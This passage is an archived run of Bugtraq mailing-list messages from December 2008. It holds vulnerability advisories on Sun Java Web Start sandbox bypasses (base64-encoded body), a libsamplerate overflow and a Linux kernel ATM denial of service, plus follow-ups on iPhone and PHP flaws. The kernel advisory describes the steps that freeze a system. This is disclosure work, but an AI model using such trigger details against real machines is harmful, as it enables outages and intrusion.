id 4792423702C; Fri,  5 Dec 2008 08:46:22 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16267 invoked from network); 5 Dec 2008 00:02:50 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-081: Sun Java Web Start and Applet Multiple Sandbox Bypass
 Vulnerabilities
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF2444B506.4EF85093-ON88257516.00015181-86257516.0001BECD@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Thu, 4 Dec 2008 18:19:04 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/04/2008 04:19:07 PM,
Serialize complete at 12/04/2008 04:19:07 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA4MTogU3VuIEphdmEgV2ViIFN0YXJ0IGFuZCBBcHBsZXQgTXVsdGlwbGUgU2FuZGJv
eCBCeXBhc3MgDQpWdWxuZXJhYmlsaXRpZXMNCmh0dHA6Ly93d3cuemVyb2RheWluaXRpYXRpdmUu
Y29tL2Fkdmlzb3JpZXMvWkRJLTA4LTA4MQ0KRGVjZW1iZXIgNCwgMjAwOA0KDQotLSBBZmZlY3Rl
ZCBWZW5kb3JzOg0KU3VuIE1pY3Jvc3lzdGVtcw0KDQotLSBBZmZlY3RlZCBQcm9kdWN0czoNClN1
biBNaWNyb3N5c3RlbXMgSmF2YSBSdW50aW1lDQoNCi0tIFRpcHBpbmdQb2ludChUTSkgSVBTIEN1
c3RvbWVyIFByb3RlY3Rpb246DQpUaXBwaW5nUG9pbnQgSVBTIGN1c3RvbWVycyBoYXZlIGJlZW4g
cHJvdGVjdGVkIGFnYWluc3QgdGhpcw0KdnVsbmVyYWJpbGl0eSBieSBEaWdpdGFsIFZhY2NpbmUg
cHJvdGVjdGlvbiBmaWx0ZXIgSUQgNTUyNywgNDcxNC4gDQpGb3IgZnVydGhlciBwcm9kdWN0IGlu
Zm9ybWF0aW9uIG9uIHRoZSBUaXBwaW5nUG9pbnQgSVBTLCB2aXNpdDoNCg0KICAgIGh0dHA6Ly93
d3cudGlwcGluZ3BvaW50LmNvbQ0KDQotLSBWdWxuZXJhYmlsaXR5IERldGFpbHM6DQpUaGVzZSB2
dWxuZXJhYmlsaXRpZXMgYWxsb3cgcmVtb3RlIGF0dGFja2VycyB0byBieXBhc3Mgc2FuZGJveA0K
cmVzdHJpY3Rpb25zIG9uIHZ1bG5lcmFibGUgaW5zdGFsbGF0aW9ucyBvZiBTdW4gSmF2YSBXZWIg
U3RhcnQuIFVzZXINCmludGVyYWN0aW9uIGlzIHJlcXVpcmVkIHRvIGV4cGxvaXQgdGhpcyB2dWxu
ZXJhYmlsaXR5IGluIHRoYXQgdGhlIHRhcmdldA0KbXVzdCB2aXNpdCBhIG1hbGljaW91cyBwYWdl
Lg0KDQpUaGUgZmlyc3QgdnVsbmVyYWJpbGl0eSByZXN1bHRzIGluIGEgY2FjaGUgbG9jYXRpb24g
YW5kIGEgdXNlciBuYW1lDQppbmZvcm1hdGlvbiBkaXNjbG9zdXJlLiBCeSBhY2Nlc3NpbmcgdGhl
IFNJX0ZJTEVESVIgcHJvcGVydHkgb2YgYQ0KU2luZ2xlSW5zdGFuY2VJbXBsIGNsYXNzLCB0aGUg
bG9jYXRpb24gb2YgdGhlIHRlbXBvcmFyeSBzaW5nbGUgaW5zdGFuY2UNCmZpbGVzIGNhbiBiZSBw
YXJzZWQgdG8gZGlzY292ZXIgdGhlIHVzZXIgbmFtZSBhbmQgY2FjaGUgbG9jYXRpb24uDQoNClRo
ZSBzZWNvbmQgdnVsbmVyYWJpbGl0eSBhbGxvd3MgYXBwbGV0cyB0byByZWFkIGFueSBmaWxlIG9u
IGEgdmljdGltJ3MNCmZpbGVzeXN0ZW0sIG91dHNpZGUgb2YgdGhlIHJlc3RyaWN0ZWQgcGF0aCBv
ZiB0aGUgYXBwbGV0LiBUaGUgc3BlY2lmaWMNCmZsYXcgZXhpc3RzIGluIHRoZSBoYW5kbGluZyBv
ZiB0aGUgZmlsZTogcHJvdG9jb2wgYXNzaWduZWQgdG8gYW4gYXBwbGV0DQpjb2RlYmFzZS4gSWYg
dGhlIGNvZGViYXNlIHBvaW50cyB0byB0aGUgbG9jYWwgZmlsZXN5c3RlbSwgYW55IGZpbGUgaXMN
CnRoZW4gcmVhZGFibGUgYnkgdGhlIG1hbGljaW91cyBhcHBsZXQuDQoNClRoZSB0aGlyZCB2dWxu
ZXJhYmlsaXR5IGFsbG93cyBKTkxQIGZpbGVzIHRvIGJ5cGFzcyBzb2NrZXQgcmVzdHJpY3Rpb25z
Lg0KQnkgbG9hZGluZyBhIHNlY29uZGFyeSBKTkxQIHdpdGggYW4gaHJlZiBhdHRyaWJ1dGUgY29u
dGFpbmluZyBhDQp3aWxkY2FyZC4gV2hlbiB0aGlzIG9iamVjdCBpcyBpbnN0YW50aWF0ZWQsIGFs
bCBob3N0cyBhcmUgZWxpZ2libGUgZm9yDQpzb2NrZXQgY29ubmVjdCBhbmQgYWNjZXB0Lg0KDQot
LSBWZW5kb3IgUmVzcG9uc2U6DQpTdW4gTWljcm9zeXN0ZW1zIGhhcyBpc3N1ZWQgYW4gdXBkYXRl
IHRvIGNvcnJlY3QgdGhpcyB2dWxuZXJhYmlsaXR5LiBNb3JlDQpkZXRhaWxzIGNhbiBiZSBmb3Vu
ZCBhdDoNCg0KaHR0cDovL3N1bnNvbHZlLnN1bi5jb20vc2VhcmNoL2RvY3VtZW50LmRvP2Fzc2V0
a2V5PTEtNjYtMjQ0OTg4LTENCg0KLS0gRGlzY2xvc3VyZSBUaW1lbGluZToNCjIwMDgtMDctMTQg
LSBWdWxuZXJhYmlsaXR5IHJlcG9ydGVkIHRvIHZlbmRvcg0KMjAwOC0xMi0wNCAtIENvb3JkaW5h
dGVkIHB1YmxpYyByZWxlYXNlIG9mIGFkdmlzb3J5DQoNCi0tIENyZWRpdDoNClRoaXMgdnVsbmVy
YWJpbGl0eSB3YXMgZGlzY292ZXJlZCBieToNCiAgICAqIFBldGVyIENzZXBlbHkNCg0KLS0gQWJv
dXQgdGhlIFplcm8gRGF5IEluaXRpYXRpdmUgKFpESSk6DQpFc3RhYmxpc2hlZCBieSBUaXBwaW5n
UG9pbnQsIFRoZSBaZXJvIERheSBJbml0aWF0aXZlIChaREkpIHJlcHJlc2VudHMgDQphIGJlc3Qt
b2YtYnJlZWQgbW9kZWwgZm9yIHJld2FyZGluZyBzZWN1cml0eSByZXNlYXJjaGVycyBmb3IgcmVz
cG9uc2libHkNCmRpc2Nsb3NpbmcgZGlzY292ZXJlZCB2dWxuZXJhYmlsaXRpZXMuDQoNClJlc2Vh
cmNoZXJzIGludGVyZXN0ZWQgaW4gZ2V0dGluZyBwYWlkIGZvciB0aGVpciBzZWN1cml0eSByZXNl
YXJjaA0KdGhyb3VnaCB0aGUgWkRJIGNhbiBmaW5kIG1vcmUgaW5mb3JtYXRpb24gYW5kIHNpZ24t
dXAgYXQ6DQoNCiAgICBodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbQ0KDQpUaGUgWkRJ
IGlzIHVuaXF1ZSBpbiBob3cgdGhlIGFjcXVpcmVkIHZ1bG5lcmFiaWxpdHkgaW5mb3JtYXRpb24g
aXMNCnVzZWQuIFRpcHBpbmdQb2ludCBkb2VzIG5vdCByZS1zZWxsIHRoZSB2dWxuZXJhYmlsaXR5
IGRldGFpbHMgb3IgYW55DQpleHBsb2l0IGNvZGUuIEluc3RlYWQsIHVwb24gbm90aWZ5aW5nIHRo
ZSBhZmZlY3RlZCBwcm9kdWN0IHZlbmRvciwNClRpcHBpbmdQb2ludCBwcm92aWRlcyBpdHMgY3Vz
dG9tZXJzIHdpdGggemVybyBkYXkgcHJvdGVjdGlvbiB0aHJvdWdoDQppdHMgaW50cnVzaW9uIHBy
ZXZlbnRpb24gdGVjaG5vbG9neS4gRXhwbGljaXQgZGV0YWlscyByZWdhcmRpbmcgdGhlDQpzcGVj
aWZpY3Mgb2YgdGhlIHZ1bG5lcmFiaWxpdHkgYXJlIG5vdCBleHBvc2VkIHRvIGFueSBwYXJ0aWVz
IHVudGlsDQphbiBvZmZpY2lhbCB2ZW5kb3IgcGF0Y2ggaXMgcHVibGljbHkgYXZhaWxhYmxlLiBG
dXJ0aGVybW9yZSwgd2l0aCB0aGUNCmFsdHJ1aXN0aWMgYWltIG9mIGhlbHBpbmcgdG8gc2VjdXJl
IGEgYnJvYWRlciB1c2VyIGJhc2UsIFRpcHBpbmdQb2ludA0KcHJvdmlkZXMgdGhpcyB2dWxuZXJh
YmlsaXR5IGluZm9ybWF0aW9uIGNvbmZpZGVudGlhbGx5IHRvIHNlY3VyaXR5DQp2ZW5kb3JzIChp
bmNsdWRpbmcgY29tcGV0aXRvcnMpIHdobyBoYXZlIGEgdnVsbmVyYWJpbGl0eSBwcm90ZWN0aW9u
IG9yDQptaXRpZ2F0aW9uIHByb2R1Y3QuDQoNCk91ciB2dWxuZXJhYmlsaXR5IGRpc2Nsb3N1cmUg
cG9saWN5IGlzIGF2YWlsYWJsZSBvbmxpbmUgYXQ6DQoNCiAgICBodHRwOi8vd3d3Lnplcm9kYXlp
bml0aWF0aXZlLmNvbS9hZHZpc29yaWVzL2Rpc2Nsb3N1cmVfcG9saWN5Lw0KDQpDT05GSURFTlRJ
QUxJVFkgTk9USUNFOiBUaGlzIGUtbWFpbCBtZXNzYWdlLCBpbmNsdWRpbmcgYW55IGF0dGFjaG1l
bnRzLA0KaXMgYmVpbmcgc2VudCBieSAzQ29tIGZvciB0aGUgc29sZSB1c2Ugb2YgdGhlIGludGVu
ZGVkIHJlY2lwaWVudChzKSBhbmQNCm1heSBjb250YWluIGNvbmZpZGVudGlhbCwgcHJvcHJpZXRh
cnkgYW5kL29yIHByaXZpbGVnZWQgaW5mb3JtYXRpb24uDQpBbnkgdW5hdXRob3JpemVkIHJldmll
dywgdXNlLCBkaXNjbG9zdXJlIGFuZC9vciBkaXN0cmlidXRpb24gYnkgYW55IA0KcmVjaXBpZW50
IGlzIHByb2hpYml0ZWQuICBJZiB5b3UgYXJlIG5vdCB0aGUgaW50ZW5kZWQgcmVjaXBpZW50LCBw
bGVhc2UNCmRlbGV0ZSBhbmQvb3IgZGVzdHJveSBhbGwgY29waWVzIG9mIHRoaXMgbWVzc2FnZSBy
ZWdhcmRsZXNzIG9mIGZvcm0gYW5kDQphbnkgaW5jbHVkZWQgYXR0YWNobWVudHMgYW5kIG5vdGlm
eSAzQ29tIGltbWVkaWF0ZWx5IGJ5IGNvbnRhY3RpbmcgdGhlDQpzZW5kZXIgdmlhIHJlcGx5IGUt
bWFpbCBvciBmb3J3YXJkaW5nIHRvIDNDb20gYXQgcG9zdG1hc3RlckAzY29tLmNvbS4gDQo
From - Fri Dec  5 11:48:31 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d67
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38837-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id CB167EEB89
for <lists@securityspace.com>; Fri,  5 Dec 2008 11:45:17 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 98903236FF8; Fri,  5 Dec 2008 08:46:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18655 invoked from network); 5 Dec 2008 01:12:18 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=nDtasMXnQ-FqBaqAbVsA:9 a=O0Ipc9RUPZcdrA_I5dQA:7 a=ZYBCh9gVs0wmRpCWMnI0kvY-HcEA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2008:238 ] libsamplerate
Date: Thu, 04 Dec 2008 18:34:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1L8PZx-0001US-3J@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:238
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : libsamplerate
 Date    : December 4, 2008
 Affected: 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 A buffer overflow was found by Russell O'Conner in the libsamplerate
 library versions prior to 0.1.4 that could possibly lead to the
 execution of arbitrary code via a specially crafted audio file
 (CVE-2008-5008).
 
 The updated packages have been patched to prevent this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5008
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 9a9cc1fbac25741ad38e914c98d90826  2008.0/i586/libsamplerate0-0.1.3-0.pre6.3.1mdv2008.0.i586.rpm
 294117b4e81f6d38553faf47b0d0b561  2008.0/i586/libsamplerate-devel-0.1.3-0.pre6.3.1mdv2008.0.i586.rpm
 695ab47e44749f3f0a6df321992f6064  2008.0/i586/libsamplerate-progs-0.1.3-0.pre6.3.1mdv2008.0.i586.rpm 
 4068b67bd67786501ddc388824763a19  2008.0/SRPMS/libsamplerate-0.1.3-0.pre6.3.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 24a792941fa5fbff89764b724923a616  2008.0/x86_64/lib64samplerate0-0.1.3-0.pre6.3.1mdv2008.0.x86_64.rpm
 c1ac9d056ca38c36658158fec3ee3f31  2008.0/x86_64/lib64samplerate-devel-0.1.3-0.pre6.3.1mdv2008.0.x86_64.rpm
 dcdffc679e6af71864d8cdb78e335df8  2008.0/x86_64/libsamplerate-progs-0.1.3-0.pre6.3.1mdv2008.0.x86_64.rpm 
 4068b67bd67786501ddc388824763a19  2008.0/SRPMS/libsamplerate-0.1.3-0.pre6.3.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 f44c5b4f55bbe4ad946f46456dce4745  2008.1/i586/libsamplerate0-0.1.3-0.pre6.3.1mdv2008.1.i586.rpm
 18a7016e5da1f0f37c3cde4222703f87  2008.1/i586/libsamplerate-devel-0.1.3-0.pre6.3.1mdv2008.1.i586.rpm
 6064159a6a594c006d16c42d29cfd240  2008.1/i586/libsamplerate-progs-0.1.3-0.pre6.3.1mdv2008.1.i586.rpm 
 32697b41d7fd390e91b4d4dbeacc0db2  2008.1/SRPMS/libsamplerate-0.1.3-0.pre6.3.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 6497eadf29decebda33422f431a83d45  2008.1/x86_64/lib64samplerate0-0.1.3-0.pre6.3.1mdv2008.1.x86_64.rpm
 2df7b9d3f1656f728667e68569cfc8af  2008.1/x86_64/lib64samplerate-devel-0.1.3-0.pre6.3.1mdv2008.1.x86_64.rpm
 b9c0276018ac620bbcd68f998b4daeac  2008.1/x86_64/libsamplerate-progs-0.1.3-0.pre6.3.1mdv2008.1.x86_64.rpm 
 32697b41d7fd390e91b4d4dbeacc0db2  2008.1/SRPMS/libsamplerate-0.1.3-0.pre6.3.1mdv2008.1.src.rpm

 Corporate 3.0:
 91ef6d6952ac4d845f4ed16b74117d8d  corporate/3.0/i586/libsamplerate0-0.0.15-2.1.C30mdk.i586.rpm
 7d1aef25a43863e4a7d89fd559312b29  corporate/3.0/i586/libsamplerate0-devel-0.0.15-2.1.C30mdk.i586.rpm
 e3d9b6a0c2d32d36bd55b3d2b9ff8fa7  corporate/3.0/i586/libsamplerate-progs-0.0.15-2.1.C30mdk.i586.rpm 
 67cdb6d349097d08925e2c4cb86d1fe6  corporate/3.0/SRPMS/libsamplerate-0.0.15-2.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 3efec8fbd1ea1fd00f9eea336afd5798  corporate/3.0/x86_64/lib64samplerate0-0.0.15-2.1.C30mdk.x86_64.rpm
 5783d23a1019bed054e713b94c5ad989  corporate/3.0/x86_64/lib64samplerate0-devel-0.0.15-2.1.C30mdk.x86_64.rpm
 f970ddd128def98252bc4090f576f4ec  corporate/3.0/x86_64/libsamplerate-progs-0.0.15-2.1.C30mdk.x86_64.rpm 
 67cdb6d349097d08925e2c4cb86d1fe6  corporate/3.0/SRPMS/libsamplerate-0.0.15-2.1.C30mdk.src.rpm

 Corporate 4.0:
 0a2d27263f81d8304028bccadb5142af  corporate/4.0/i586/libsamplerate0-0.1.2-1.1.20060mlcs4.i586.rpm
 7d3dddddbad29db356b97dc77f720c0a  corporate/4.0/i586/libsamplerate0-devel-0.1.2-1.1.20060mlcs4.i586.rpm
 9b2bc33430ac70a2c24eab9f2afee0c2  corporate/4.0/i586/libsamplerate-progs-0.1.2-1.1.20060mlcs4.i586.rpm 
 83cdd1d3349f1017c4c92cb6ee0fb636  corporate/4.0/SRPMS/libsamplerate-0.1.2-1.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 ffbc6a9d6d3403a52ca5cbe3c4a3495d  corporate/4.0/x86_64/lib64samplerate0-0.1.2-1.1.20060mlcs4.x86_64.rpm
 991dd38ed664577613f6a55da77eaa29  corporate/4.0/x86_64/lib64samplerate0-devel-0.1.2-1.1.20060mlcs4.x86_64.rpm
 92d88adbf9d580a772b702f33cf8d027  corporate/4.0/x86_64/libsamplerate-progs-0.1.2-1.1.20060mlcs4.x86_64.rpm 
 83cdd1d3349f1017c4c92cb6ee0fb636  corporate/4.0/SRPMS/libsamplerate-0.1.2-1.1.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJOFc0mqjQ0CJFipgRAjweAKDVUt2pCqRSgKnXlJI0gJoSgbuXBACeMk6+
SxoIyNyLtbDX6XnTUTazqts=Kbrk
-----END PGP SIGNATURE-----

From - Fri Dec  5 13:38:18 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d6c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38838-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 78397EEFE4
for <lists@securityspace.com>; Fri,  5 Dec 2008 13:37:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 37F4B236F76; Fri,  5 Dec 2008 11:24:53 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19227 invoked from network); 5 Dec 2008 01:49:39 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s�fault; d=synchlabs.com;
h=Received:Message-ID:Date:From:User-Agent:MIME-Version:To:Subject:X-Enigmail-Version:Content-Type:Content-Transfer-Encoding:X-Identified-User;
b=S+OPGlUNIEUEvE7GsV3xjFm/zJlWIxa6n6Mdp7PCt94aty0krQ4Zul29i0zLHX+GFnfnUoziQyu9WDZGp4D6iX0prwVAGAOM6yeV9vQcxdU+iAN1bf/oEBJshSy0U/sO;
Message-ID: <49388C8A.4070208@synchlabs.com>
Date: Fri, 05 Dec 2008 02:06:02 +0000
From: Hugo Dias <hdias@synchlabs.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vuln@secunia.com, ssynchron@gmail.com
Subject: CVE-2008-5079: multiple listen()s on same socket corrupts the vcc
 table
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Identified-User: {2347:fast26.fastdomain.com:synchlab:synchlabs.com} {sentby:smtp auth 89.181.106.208 authed with hdias+synchlabs.com}
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE-2008-5079: multiple listen()s on same socket corrupts the vcc table

Release Date: 2008/12/05

I. Impact

Local Denial of Service on Linux kernel 2.6.x


II. Description

A vulnerabilty exists in Linux Kernel which can be exploited
by malicious users to cause a Denial of Service.

It seems that calling the svc_listen function in 'net/atm/svc.c'
twice on same socket, will create unassigned PVC/SVC entries,
despite returning EUNATCH.

This entries are visible using proc filesystem.

#cat /proc/net/atm/vc

Address  Itf ...
c7f34400 Unassigned   ...
c7f34400 Unassigned   ...
c7f34400 Unassigned   ...
.......

The code in 'net/atm/proc.c', responsible for displaying this info,
can't handle the unassigned entries. Kernel will freeze with
infinite loop in 'proc.c' if we cat '/proc/net/atm/pvc'  :


net/atm/proc.c:

074 static inline int compare_family(struct sock *sk, int family)
073 {
074         return !family || (sk->sk_family == family);
075 }

091 try_again:
092         for (; sk; sk = sk_next(sk)) {
093                 l -= compare_family(sk, family); <<<<<<<<<
094                 if (l < 0)
095                         goto out;
096         }


IV. Patch

http://marc.info/?l=linux-netdev&m2841256115780&w=2

V. Credit

Hugo Dias - hdias [at] synchlabs [dot] com


VI. History

2008/11/14 - Vulnerability Discovered
2008/11/28 - Reported to vendor
2008/12/05 - Vendor Released Patch
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.10-svn4870 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkk4jIoACgkQE8nuJSQgUf2IawCgm6bdEkoj5DCGJPIXOob60nSM
lTwAnRtJCDPW4d4FE7F6KpzKw46EqO7d
=9Qis
-----END PGP SIGNATURE-----

From - Fri Dec  5 16:38:19 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d6e
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38839-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 2253FEEFD7
for <lists@securityspace.com>; Fri,  5 Dec 2008 16:30:06 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id CDC53237334; Fri,  5 Dec 2008 13:59:04 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2859 invoked from network); 5 Dec 2008 16:07:20 -0000
Date: 5 Dec 2008 16:17:59 -0000
Message-ID: <20081205161759.26183.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: VulnerabilityAlert@ddifrontline.com
To: bugtraq@securityfocus.com
Subject: RE: DDIVRT-DDIVRT-2008-15 iPhone Configuration Web Utility 1.0
 for Windows Directory Traversal
Status:   

Solution Description - Update
-----------------------------
Apple has fixed this issue and uploaded a new version of this product to their website.  They have not changed the version information or announced the new release, but the flaw is fixed.

From - Sat Dec  6 11:58:48 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d74
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38841-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C28CDEEACC
for <lists@securityspace.com>; Sat,  6 Dec 2008 11:55:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 41E582375D0; Sat,  6 Dec 2008 09:41:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4449 invoked from network); 6 Dec 2008 12:30:29 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=simple; s=one; d=codelabs.ru;
h=Received:Date:From:To:Cc:Subject:Message-ID:References:MIME-Version:Content-Type:Content-Disposition:In-Reply-To:Sender;
b=csvi1KGVo6A70s1lpPw2zWu/n8KdnqEIDK+79Wp+5MKCZxws+AxjKRBHwR3X6g6UlKWEu2hsDu+9JmnJ8Xg+M4VApGHDstiUznVgygr5IHULXm0ap8dCZQ4lwQFUlOZuf0PLpHJhRW5SnopkDhp0ZXHHkqSuv3cE9n156wjaZaY=;
Date: Sat, 6 Dec 2008 15:47:14 +0300
From: Eygene Ryabinkin <rea-sec@codelabs.ru>
To: cxib@securityreason.com
Cc: bugtraq@securityfocus.com, ilia@php.net
Subject: Re: SecurityReason : PHP 5.2.6 dba_replace() destroying file
Message-ID: <SZBVsRN2yvv5bQ7qjQDFibMNik0@kjaK+/sQ5DW5981v71UogZJPf/0>
References: <20081127235444.12197.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Disposition: inline
In-Reply-To: <20081127235444.12197.qmail@securityfocus.com>
Sender: rea-sec@codelabs.ru
Status:   

Maksymilian, Ilia, good day.

Thu, Nov 27, 2008 at 11:54:44PM -0000, cxib@securityreason.com wrote:
> [ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ]
[...]
> - --- 1. dba_replace() destroying file ---
> 
> Function dba_replace() are not filtring strings key and value. There
> is a possibility the destruction of the file.

This vulnerability exists in 4.x line as well and it is still unpatched.
Had verified it for dba extension from 4.4.9.

According to the revision log,
  http://cvs.php.net/viewvc.cgi/php-src/ext/dba/libinifile/inifile.c?view=log&pathrevthere is no fix in the official PHP tree for 4.x yet.
-- 
Eygene

From - Sat Dec  6 12:08:48 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d75
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38842-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 494BCEC817
for <lists@securityspace.com>; Sat,  6 Dec 2008 12:04:57 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6CBC22370C8; Sat,  6 Dec 2008 09:42:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
